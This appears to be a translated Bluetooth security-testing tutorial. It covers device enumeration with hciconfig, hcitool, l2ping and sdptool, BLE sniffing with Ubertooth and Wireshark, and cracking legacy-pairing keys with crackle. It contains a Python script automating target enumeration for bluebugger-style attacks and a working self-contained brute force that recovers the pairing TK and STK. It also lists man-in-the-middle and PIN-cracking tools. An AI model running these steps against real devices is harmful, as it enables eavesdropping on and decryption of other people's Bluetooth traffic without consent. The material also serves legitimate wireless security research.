Viewing Bluetooth details on Android: in the dialer, enter *#*#2846579#*#* and the phone jumps to the engineering menu automatically. (This is the Huawei/Honor engineering-menu code, not a universal Android one; other vendors use different codes or none at all.)

After the system boots, check that the adapter is visible on USB (in the lsusb output below, 1d50:6002 is the Ubertooth One, which enumerates under the OpenMoko vendor ID):

root@Xstorm:/mnt# lsusb
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 005: ID 1d50:6002 OpenMoko, Inc. 
Bus 002 Device 004: ID 0e0f:0008 VMware, Inc. 
Bus 002 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 002 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

The drivers that should be loaded (btusb binds the USB adapter; bluetooth is the core stack it depends on):

root@Xstorm:/mnt# lsmod | grep bt
btusb                  40960  0 
bluetooth             491520  22 bnep,btusb,rfcomm


If a Bluetooth adapter is present, check its status and details. In the output below, UP RUNNING PSCAN ISCAN means the adapter is up, connectable (page scan) and discoverable (inquiry scan); the BD address is the one remote tools will see:

root@Xstorm:/mnt# hciconfig -a 
hci0:    Type: BR/EDR  Bus: USB
    BD Address: BC:3D:85:BA:FB:D6  ACL MTU: 8192:128  SCO MTU: 64:128
    UP RUNNING PSCAN ISCAN 
    RX bytes:4018 acl:6 sco:0 events:152 errors:0
    TX bytes:1204 acl:12 sco:0 commands:77 errors:0
    Features: 0xff 0xff 0x8f 0xfe 0x83 0xe1 0x08 0x80
    Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3 
    Link policy: RSWITCH HOLD SNIFF PARK 
    Link mode: SLAVE ACCEPT 
    Name: 'ubuntu-0'
    Class: 0x640100
    Service Classes: Rendering, Audio, Telephony
    Device Class: Computer, Uncategorized
    HCI Version: 2.1 (0x4)  Revision: 0x100
    LMP Version: 2.1 (0x4)  Subversion: 0x100
    Manufacturer: not assigned (6502)

Common Bluetooth commands:

hciconfig hci0 up    # bring the adapter up
hciconfig hci0 down  # bring the adapter down (hciconfig has no "off" command)

Bluetooth scanning:

hcitool scan          # classic (BR/EDR) inquiry; only finds devices that are discoverable
hcitool lescan        # BLE scan; lists advertising devices, needs root

Test connectivity (l2ping works against devices that are connectable but not discoverable, as long as you know the address):

l2ping -i hci0 -c 4 24:1F:A0:CE:50:69    # send 4 L2CAP echo requests to check that 24:1F:A0:CE:50:69 is reachable


Using SDP (Service Discovery Protocol), we can also see what each device can do and which services it offers:

root@Xstorm:/mnt# sdptool browse local    # replace "local" with the Bluetooth MAC address of a remote device
Browsing FF:FF:FF:00:00:00 ...
Service Name: SIM Access Server
Service RecHandle: 0x10000
Service Class ID List:
  "SIM Access" (0x112d)
  "Generic Telephony" (0x1204)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 8
Profile Descriptor List:
  "SIM Access" (0x112d)
    Version: 0x0101

Service Name: Headset Audio Gateway
Service RecHandle: 0x10001
Service Class ID List:
  "Headset Audio Gateway" (0x1112)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 12
Profile Descriptor List:
  "Headset" (0x1108)
    Version: 0x0102

Service Name: Hands-Free Audio Gateway
Service RecHandle: 0x10002
Service Class ID List:
  "Handsfree Audio Gateway" (0x111f)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 13
Profile Descriptor List:
  "Handsfree" (0x111e)
    Version: 0x0105

Service Name: Hands-Free
Service RecHandle: 0x10003
Service Class ID List:
  "Handsfree" (0x111e)
  "Generic Audio" (0x1203)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7
Profile Descriptor List:
  "Handsfree" (0x111e)
    Version: 0x0105

Service Name: AVRCP TG
Service RecHandle: 0x10004
Service Class ID List:
  "AV Remote Target" (0x110c)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x103
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0104

Service Name: AVRCP CT
Service RecHandle: 0x10005
Service Class ID List:
  "AV Remote" (0x110e)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x103
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0100
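The scan, l2ping and sdptool steps above are normally repeated for every device found, so here is an added example (Python, not code from the original post) that chains them and parses `sdptool browse` records into a per-service summary, which is what you want before pointing rfcomm- or bluebugger-style tools at a device. Two of the records printed above are embedded as sample input, and the `hcitool scan` sample is constructed. `enumerate_devices` assumes the BlueZ tools `hcitool`, `l2ping` and `sdptool` are on PATH, that it runs as root, and that a zero exit status from l2ping means the peer answered (an assumption); it only talks to hardware when you call it.

```python
import re
import subprocess

# Two records from the `sdptool browse local` output above, embedded as sample
# input so the parser can be exercised without an adapter.
SAMPLE_SDP = """\
Browsing FF:FF:FF:00:00:00 ...
Service Name: SIM Access Server
Service RecHandle: 0x10000
Service Class ID List:
  "SIM Access" (0x112d)
  "Generic Telephony" (0x1204)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 8
Profile Descriptor List:
  "SIM Access" (0x112d)
    Version: 0x0101

Service Name: AVRCP TG
Service RecHandle: 0x10004
Service Class ID List:
  "AV Remote Target" (0x110c)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x103
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0104
"""

# Constructed `hcitool scan` output (addresses and names are made up).
SAMPLE_SCAN = "Scanning ...\n\t24:1F:A0:CE:50:69\tCar Kit\n\tA2:CF:49:FD:99:AF\tHandset\n"

BDADDR = re.compile(r"^\s*([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s*(.*)$")
UUID_LINE = re.compile(r'^\s+"([^"]+)" \((0x[0-9A-Fa-f]+)\)')
PORT_LINE = re.compile(r"^\s+(Channel|PSM): (\d+)")

def parse_scan(text):
    """[(bdaddr, name)] from `hcitool scan` output; the header line is skipped."""
    hits = [BDADDR.match(line) for line in text.splitlines()]
    return [(m.group(1).upper(), m.group(2).strip()) for m in hits if m]

def parse_sdp(text):
    """One dict per service record in `sdptool browse` output."""
    records, rec, section = [], None, None
    for line in text.splitlines():
        if line.startswith("Service Name:"):
            rec = {"name": line.split(":", 1)[1].strip(), "handle": None,
                   "classes": [], "protocols": [], "profiles": [],
                   "rfcomm_channel": None, "l2cap_psm": None}
            records.append(rec)
            section = None
        elif rec is None:
            continue                      # "Browsing ..." header and the like
        elif line.startswith("Service RecHandle:"):
            rec["handle"] = int(line.split(":", 1)[1], 16)
        elif line.startswith("Service Class ID List:"):
            section = "classes"
        elif line.startswith("Protocol Descriptor List:"):
            section = "protocols"
        elif line.startswith("Profile Descriptor List:"):
            section = "profiles"
        elif section:
            m = UUID_LINE.match(line)
            if m:
                rec[section].append((m.group(1), int(m.group(2), 16)))
            m = PORT_LINE.match(line)
            if m and section == "protocols":
                key = "rfcomm_channel" if m.group(1) == "Channel" else "l2cap_psm"
                rec[key] = int(m.group(2))
    return records

def rfcomm_surface(records):
    """Sorted [(channel, service name)] for every RFCOMM-reachable service; these
    channels are what rfcomm/bluebugger-style tools connect to."""
    return sorted((r["rfcomm_channel"], r["name"])
                  for r in records if r["rfcomm_channel"] is not None)

def enumerate_devices(hci="hci0"):
    """scan -> l2ping -> sdptool browse for every device found, i.e. the manual
    steps above in one pass. Needs root and an adapter; assumes l2ping exits 0
    when the peer answered."""
    results = {}
    scan = subprocess.run(["hcitool", "-i", hci, "scan"], capture_output=True, text=True)
    for addr, name in parse_scan(scan.stdout):
        ping = subprocess.run(["l2ping", "-i", hci, "-c", "1", addr], capture_output=True)
        services = []
        if ping.returncode == 0:
            sdp = subprocess.run(["sdptool", "browse", addr], capture_output=True, text=True)
            services = parse_sdp(sdp.stdout)
        results[addr] = {"name": name, "reachable": ping.returncode == 0,
                         "services": services, "rfcomm": rfcomm_surface(services)}
    return results
```

`rfcomm_surface(parse_sdp(SAMPLE_SDP))` yields `[(8, "SIM Access Server")]`: the AVRCP record sits on L2CAP PSM 23 with no RFCOMM channel, so it does not show up as an RFCOMM target. Run `enumerate_devices()` as root with the adapter up to do the same against live devices.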


Live sniffing of Bluetooth LE traffic:

mkfifo /mnt/pipe
Open Wireshark:
Capture -> Options -> Manage Interfaces -> New
enter /mnt/pipe
click Start to begin listening.

# Note: the ubertooth tools need Ubertooth hardware
root@Xstorm:/mnt# ubertooth-btle -f -c /mnt/pipe    # -f: follow connections as they are set up; -c: write packets to this pcap/pipe
Finally, do not forget this step, otherwise the captured packets cannot be decoded at all:
Edit → Preferences → Protocols → DLT_USER → Edit → New
enter btle as the payload protocol
ok → ok
(This DLT_USER mapping is only needed when Wireshark shows the frames as DLT_USER. Current ubertooth host tools write the capture with the BLE link-layer link type, which Wireshark dissects directly.)


If you want to take the capture away and work through it later, simply write it to a file instead of the pipe:

ubertooth-btle -f -c /output.pcap

Once we have a capture, the question that matters most is whether we caught enough of the pairing to crack the TK.

So in Wireshark apply the display filter btsmp and make sure the six SMP packets we need are present: Pairing Request, Pairing Response, the two Pairing Confirm and the two Pairing Random PDUs. crackle additionally needs the CONNECT_REQ (for the two device addresses) and the LL_ENC_REQ/LL_ENC_RSP exchange (SKD and IV halves) to derive the session key, so the sniffer has to be following the connection before pairing starts. This only works against legacy pairing with Just Works or Passkey Entry; LE Secure Connections (Bluetooth 4.2 and later) does not expose the TK this way.

With crackle and the capture, crack the TK first and then recover the LTK:

crackle -i /output.pcap -o test66.pcap    # prints the TK and LTK when found and writes the decrypted packets to test66.pcap

Once the LTK is known, later sessions between the same two devices can be decrypted with crackle's -l <ltk> option without cracking again.
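To see why those six SMP packets plus the CONNECT_REQ are enough, here is an added Python example (not crackle's code, not from the original post) that reimplements the part of crackle's attack this page relies on: the c1 confirm-value function from the Core Specification, a brute force over all 10^6 TK candidates, and the s1 STK derivation. It carries its own small AES-128 (FIPS-197) so it runs offline; the pairing request/response, addresses and random values in demo() are constructed, and the function names are this example's own. What crackle does next, deriving the session key from the STK and the LL_ENC_REQ/LL_ENC_RSP values and AES-CCM-decrypting the Encryption Information PDU that carries the LTK, is not repeated here.

```python
"""Added example, not crackle's own code: the TK brute force crackle performs on a
sniffed BLE legacy pairing, then the STK derivation. A small pure-Python AES-128
stands in for the spec's e() so this runs offline; the values in demo() are constructed."""

def _gmul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    p = 0
    for _ in range(8):
        if b & 1:
            p ^= a
        a = ((a << 1) ^ 0x1B) & 0xFF if a & 0x80 else a << 1
        b >>= 1
    return p

def _affine(x):                       # S-box affine map applied to the inverse
    rot = lambda v, s: ((v << s) | (v >> (8 - s))) & 0xFF
    return x ^ rot(x, 1) ^ rot(x, 2) ^ rot(x, 3) ^ rot(x, 4) ^ 0x63

_SBOX = [0x63] * 256                  # S[0] = 0x63 since 0 has no inverse
for _a in range(1, 256):
    _SBOX[_a] = _affine(next(b for b in range(1, 256) if _gmul(_a, b) == 1))
_MUL2 = [_gmul(x, 2) for x in range(256)]
_MUL3 = [_gmul(x, 3) for x in range(256)]

def _expand_key(key):
    """FIPS-197 key schedule: 44 words, returned as 11 sixteen-byte round keys."""
    w = [list(key[4 * i:4 * i + 4]) for i in range(4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [_SBOX[b] for b in t[1:] + t[:1]]      # RotWord + SubWord
            t[0] ^= rcon
            rcon = _MUL2[rcon]
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [bytes(sum(w[4 * r:4 * r + 4], [])) for r in range(11)]

def aes128_encrypt(key, block):
    """Encrypt one block; state byte i sits in row i % 4, column i // 4."""
    rk = _expand_key(key)
    s = [b ^ k for b, k in zip(block, rk[0])]
    for r in range(1, 11):
        s = [_SBOX[b] for b in s]                              # SubBytes
        s = [s[(i + 4 * (i % 4)) % 16] for i in range(16)]    # ShiftRows
        if r < 10:                                             # MixColumns
            m = []
            for c in range(0, 16, 4):
                a0, a1, a2, a3 = s[c:c + 4]
                m += [_MUL2[a0] ^ _MUL3[a1] ^ a2 ^ a3, a0 ^ _MUL2[a1] ^ _MUL3[a2] ^ a3,
                      a0 ^ a1 ^ _MUL2[a2] ^ _MUL3[a3], _MUL3[a0] ^ a1 ^ a2 ^ _MUL2[a3]]
            s = m
        s = [b ^ k for b, k in zip(s, rk[r])]                 # AddRoundKey
    return bytes(s)

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def c1(k, r, preq, pres, iat, ia, rat, ra):
    """Confirm value (Core Spec Vol 3 Part H 2.2.3): e(k, e(k, r ^ p1) ^ p2).
    Inputs are most-significant-octet-first as in the spec, so SMP payloads and
    BD_ADDRs taken off the air have to be byte-reversed before they get here."""
    p1 = pres + preq + bytes([rat, iat])          # 7 + 7 + 1 + 1 octets
    p2 = bytes(4) + ia + ra                       # 4 zero octets + 6 + 6
    return aes128_encrypt(k, _xor(aes128_encrypt(k, _xor(r, p1)), p2))

def s1(k, srand, mrand):
    """STK (2.2.4): e(k, low 64 bits of Srand || low 64 bits of Mrand)."""
    return aes128_encrypt(k, srand[8:] + mrand[8:])

def crack_tk(mconfirm, mrand, sconfirm, srand, preq, pres, iat, ia, rat, ra):
    """Everything in c1 except k is on the air, and k is 0 (Just Works) or a
    6-digit passkey: try each until Mconfirm matches, then check Sconfirm."""
    for tk in range(1_000_000):
        k = tk.to_bytes(16, "big")
        if c1(k, mrand, preq, pres, iat, ia, rat, ra) == mconfirm and \
           c1(k, srand, preq, pres, iat, ia, rat, ra) == sconfirm:
            return tk
    return None

def demo(passkey=1234):
    """Constructed pairing: compute the confirm values a sniffer would see for
    `passkey`, then recover the TK and STK from them the way crackle does."""
    preq = bytes.fromhex("01040001100707")[::-1]   # SMP PDU in wire order, reversed
    pres = bytes.fromhex("02000001100707")[::-1]
    ia, iat = bytes.fromhex("a1a2a3a4a5a6"), 0      # public addresses, made up
    ra, rat = bytes.fromhex("b1b2b3b4b5b6"), 0
    mrand = bytes.fromhex("5783d52156ad6f0e6388274ec6702ee0")
    srand = bytes.fromhex("0e2cf9cb6d0a8d7f3e1b2a4c5d6e7f80")
    tk = passkey.to_bytes(16, "big")
    mconfirm = c1(tk, mrand, preq, pres, iat, ia, rat, ra)
    sconfirm = c1(tk, srand, preq, pres, iat, ia, rat, ra)
    found = crack_tk(mconfirm, mrand, sconfirm, srand, preq, pres, iat, ia, rat, ra)
    stk = None if found is None else s1(found.to_bytes(16, "big"), srand, mrand)
    return found, stk
```

`demo()` returns the recovered passkey and the STK. To feed it a real capture you would take the 7-byte SMP Pairing Request/Response payloads, the two 6-byte addresses from CONNECT_REQ (with their address-type bits), and the 16-byte Mconfirm/Sconfirm/Mrand/Srand values, each byte-reversed from wire order. The search is cheap because legacy pairing leaks every c1 input except k, and k has at most a million values; that is the whole reason Just Works and Passkey Entry give no protection against a sniffer.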

Toolset:

Testing tools

Ubuntu platform:

  • hcitool, bluetoothctl and similar tools: scan for, connect to, pair with and advertise to BLE devices [shipped with Ubuntu]
  • hcitool can also send raw HCI commands, for example to set BLE advertising data [shipped with Ubuntu]
  • sdptool: query a device's SDP records to see which services it offers [shipped with Ubuntu]
  • hciconfig: show and configure the local adapter [shipped with Ubuntu]
  • l2ping: test whether a device is reachable at the L2CAP layer [shipped with Ubuntu]
  • bluebugger
  • ClusterFuzz
  • gatttool: works at the GATT level, connecting to a GATT profile and reading/writing service attributes [https://www.jaredwolff.com/blog/get-started-with-bluetooth-low-energy/]
  • Btproxy, a Bluetooth proxy / man-in-the-middle tool [https://github.com/conorpp/btproxy]
  • crackle, cracks the TK and recovers the LTK from a sniffed legacy pairing, then decrypts the traffic [https://github.com/mikeryan/crackle]
  • btlejuice, a BLE man-in-the-middle testing framework [https://github.com/DigitalSecurity/btlejuice]
  • ubertooth: a very capable Bluetooth sniffer (open hardware plus host tools) [https://github.com/greatscottgadgets/ubertooth/wiki/Build-Guide]
    •     ubertooth-scan
    •     ubertooth-rx
    •     ubertooth-follow
    •     ubertooth-btle

Windows platform:

  • BluetoothView

Android platform:

  • Bluetooth Finder
  • btCrawler
  • BTScanner
  • BlueScan


Test hardware:

  • "SENA Parani UD-100" adapter
  • Bluetooth dongle -- classic Bluetooth
  • 超牙一号
  • Frontline sniffers, http://www.fte.com -- classic Bluetooth
  • BEX400, Bluetooth sniffer and PIN-cracking device -- classic Bluetooth
  • CC2540 USB evaluation module (TI's BLE packet-sniffer dongle)

 
